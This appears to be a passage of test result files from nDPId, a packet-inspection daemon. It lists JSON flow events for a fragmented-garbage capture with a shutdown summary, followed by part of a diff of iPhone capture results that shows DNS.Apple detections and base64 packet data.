00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031384,"flow_last_seen":1534244031384,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18762,"dst_port":18503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027737,"flow_last_seen":1534244027737,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18248,"dst_port":19019,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032907,"flow_last_seen":1534244032907,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":27502,"dst_port":30307,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244026217,"flow_last_seen":1534244026217,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":24101,"dst_port":9251,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025305,"flow_last_seen":1534244025305,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9253,"dst_port":24102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00602{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244032298,"flow_last_seen":1534244032298,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9251,"dst_port":9770,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031993,"flow_last_seen":1534244031993,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":29799,"dst_port":26228,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244025912,"flow_last_seen":1534244025912,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":21029,"dst_port":22878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244033211,"flow_last_seen":1534244033211,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":10792,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028041,"flow_last_seen":1534244028041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13105,"dst_port":14648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030777,"flow_last_seen":1534244030777,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13362,"dst_port":12596,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00603{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244027129,"flow_last_seen":1534244027129,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":13617,"dst_port":10536,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00604{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00588{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244031080,"flow_last_seen":1534244031080,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244033211,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":18258,"dst_port":16199,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00575{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":9077,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","packets-captured":9077,"packets-processed":29,"total-skipped-flows":0,"total-l4-data-len":80,"total-not-detected-flows":29,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":29,"total-idle-flows":29,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":18215,"global_ts_msec":1534244033215}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 9077/29

222
test/results/iphone.pcap.out
View File

@@ -78,8 +78,8 @@
00785{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":56,"source":"iphone.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598209,"flow_last_seen":1582454598248,"flow_idle_time":180000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":226,"flow_avg_l4_payload_len":113,"midstream":0,"thread_ts_msec":1582454598248,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":61862,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gspe35-ssl.ls.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.25.53"}}
00576{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1582454598252,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1582454598252,"pkt":"xGGLNYKpxiwDYGpkCABFAACEYIUAAEARlIHAqAIBwKgCEQA12moAcAk\/JH+BgAABAAIAAAAACWdzcDg1LXNzbAJscwVhcHBsZQNjb20AAAEAAcAMAAUAAQAADY0AJAlnc3A4NS1zc2wJbHMyLWFwcGxlA2NvbQZha2FkbnMDbmV0AMA0AAEAAQAAAD8ABBGCAi4="}
00782{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":57,"source":"iphone.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454598212,"flow_last_seen":1582454598252,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":55914,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Apple","breed":"Safe","category":"Web"},"dns": {"query":"gsp85-ssl.ls.apple.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"17.130.2.46"}}
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454598252,"flow_last_seen":1582454598252,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454598252,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1582454598252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454598252,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGrHrAqAIREfi5jMWPAbsN6rbUAAAAALDC\/\/8jQQAAAgQFtAEDAwcBAQgKEd\/m0wAAAAAEAgAA"}
